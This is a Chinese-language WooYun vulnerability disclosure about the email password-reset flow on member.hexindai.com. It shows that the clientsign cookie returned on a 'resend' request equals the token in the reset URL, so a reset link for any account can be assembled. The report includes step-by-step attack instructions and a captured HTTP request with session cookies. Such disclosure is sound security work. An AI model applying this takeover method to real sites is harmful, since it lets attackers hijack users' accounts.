WooYun.org

还是密码找回的问题，这次是使用邮箱密码找回存在问题，不同的姿势，所以分开提交了。
正常的邮箱找回密码流程如下：
1，输入用户名，输入图片验证码，下一步；
2，点击邮箱方式找回密码，会自动往绑定的邮箱中发送一份邮件;
3，打开邮件中重置密码的URL进行密码重置。
但是由于设计缺陷，重置其它用户的密码不需要知道用户邮箱收到的具体URL。攻击方法如下：
1，随意输入一存在的用户帐号，输入图形验证码，下一步；
2，点击重新发送，抓包，如图：

抓到的http请求中，cookie中的clientsign的值刚好是收到邮件中重置密码用的URL中的关键一段。
GET /password/email-action_checkcode.html HTTP/1.1
Host: member.hexindai.com
Cookie: mediaid=%7B%22domain%22%3A%22www.baidu.com%22%2C%22word%22%3A%22%E8%B1%AB%E5%95%86%E8%B4%B7%22%2C%22adId%22%3A%2286914%22%7D; PHPSESSID=tqvec4naj4e4g8u7u4dffq3o53; SERVERID=3; _client=3bcNdgFSMVxdBl9RAQkGFVZWFFcCGwEDRAVxV1MUVnVSAER0CV8AW0QqJl4ADAAJUFIBVQECAQZQAA%3D%3D; clientsign=8u5ARNqRJTEdmBEZDEw0RRXF3GlxBCFIPAQsDQxoSMwRCFkQMQBZjHEYAfHRBWEEAGh8aKgxeD1h%2BUl0EFApBDVQJWAxGB0QRFEkXdQ4DCl0aCRoOBktWW3BCQU9VXw5HHUdkAkERRwpEEWZEAhYWQhoJGldBFURmQlxWCFpVKiETXxZSBlUPXQFHGRIxBwJddlJVA0EDRGpFClFXVWwWU1JWDD9HVQJUUEcZEi4NAVhUVnYTDlsDRBIJElAFBVFUA1YFVwVaFUkULEZmBhAKV1FWXCQafAtXWV8SWxQBQUkTLEc1VxBeA18AUXIaLwxTUV9dKBZUBFNCEQpDBxJPR2IAWgdmC1oAFF8EBFBTVQMKAw5eHg%3D%3D; Hm_lvt_74e2b81268e3fe145a8ab7e9f3111b6f=1431601813,1431618073,1431621243; Hm_lpvt_74e2b81268e3fe145a8ab7e9f3111b6f=1431622078; Hm_lvt_37a55a9ab817bfae8d29a7f73f94704d=1431601814,1431618073,1431621243; Hm_lpvt_37a55a9ab817bfae8d29a7f73f94704d=1431622078; CNZZDATA1253587991=1172030106-1431616739-null%7C1431616739
收到的邮件，如图：

亲爱的 hellotest，您好！
您在2015-05-15 00:47:59请求找回和信贷登录密码，请您在24小时内点击下面的链接，重设您的密码：
https://member.hexindai.com/password/reset-action_email-sign_8u5ARNqRJTEdmBEZDEw0RRXF3GlxBCFIPAQsDQxoSMwRCFkQMQBZjHEYAfHRBWEEAGh8aKgxeD1h+Ul0EFApBDVQJWAxGB0QRFEkXdQ4DCl0aCRoOBktWW3BCQU9VXw5HHUdkAkERRwpEEWZEAhYWQhoJGldBFURmQlxWCFpVKiETXxZSBlUPXQFHGRIxBwJddlJVA0EDRGpFClFXVWwWU1JWDD9HVQJUUEcZEi4NAVhUVnYTDlsDRBIJElAFBVFUA1YFVwVaFUkULEZmBhAKV1FWXCQafAtXWV8SWxQBQUkTLEc1VxBeA18AUXIaLwxTUV9dKBZUBFNCEQpDBxJPR2IAWgdmC1oAFF8EBFBTVQMKAw5eHg==.html 
(如果链接无法点击，请复制到浏览器的地址栏中访问)

因此就可以直接拼凑出重置其它用户密码的url进行密码重置。